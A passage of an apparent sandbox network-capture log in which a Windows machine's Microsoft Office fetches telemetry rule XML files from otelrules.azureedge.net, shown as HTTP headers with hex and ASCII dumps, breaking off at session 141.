2024-11-13 19:39:46 UTC	16384	IN	Data Raw: 94 22 1e 7d b0 6a 95 14 85 b6 9f 56 47 3e e9 1b d3 5f a5 ac 50 c3 87 e4 2f 7d 48 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 Data Ascii: "}jVG>_P/}HIdqP7J"RUJS<?e3(Z.v4zg9>X#,~0"1OvD#jK_F(Mu,abs&0`K`\|'5Z:-#BoFX1-3JESJY(bJX@D[93&Pq<jy@^2%

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.5	49905	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:45 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:45 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:45 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: ec000542-b01e-005c-62a0-344c66000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193945Z-1749fc9bdbdkq6zthC1DFW38fn00000001e000000000byvm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:45 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.5	49908	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:45 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:45 UTC	538	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:45 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: 6c65b011-001e-000b-6024-2c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193945Z-16547b76f7f8dwtrhC1DFWd1zn0000000hm000000000x2p5 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:45 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.5	49907	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:45 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:45 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:45 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: d8a1d9da-001e-005a-05a1-34c3d0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193945Z-1749fc9bdbdns7kfhC1DFWb6c400000001n00000000053k0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:45 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.5	49909	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:45 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:45 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:45 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: 8dbb7985-901e-005b-56a0-342005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193945Z-r178fb8d765z89v7hC1DFW0kvw000000018g00000000rp8u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:45 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.5	49910	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:46 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:46 UTC	538	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:46 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: 3018dd1c-101e-008d-1bd2-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193946Z-16547b76f7fj897nhC1DFWdwq40000000hfg000000009shh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-13 19:39:46 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.5	49912	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:46 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:46 UTC	538	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:46 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: 9890a075-d01e-002b-06d2-2c25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193946Z-16547b76f7fnlcwwhC1DFWz6gw0000000hp000000000ntcg x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:46 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.5	49913	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:46 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:46 UTC	517	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:46 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: 29f76c25-201e-0000-6fd2-2ca537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193946Z-16547b76f7fp6mhthC1DFWrggn0000000hr000000000b8qt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:46 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.5	49911	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:46 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:46 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:46 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: faadfed8-a01e-0053-1b60-358603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193946Z-1749fc9bdbd2jxtthC1DFWfk5w00000001e0000000008t76 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:46 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.5	49914	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:47 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:47 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:47 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: 50ec610d-601e-0070-10a1-34a0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193947Z-1749fc9bdbds4vwlhC1DFWz44000000001fg000000002acd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:47 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.5	49915	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:47 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:47 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:47 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 0d4844d6-201e-0071-59a0-34ff15000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193947Z-1749fc9bdbdkq6zthC1DFW38fn00000001fg000000005w6z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:47 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.5	49916	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:47 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:47 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:47 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: 7cdf3305-b01e-0070-0ea7-341cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193947Z-r178fb8d765jv86hhC1DFW8pt000000001h0000000008nt8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:47 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.5	49917	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
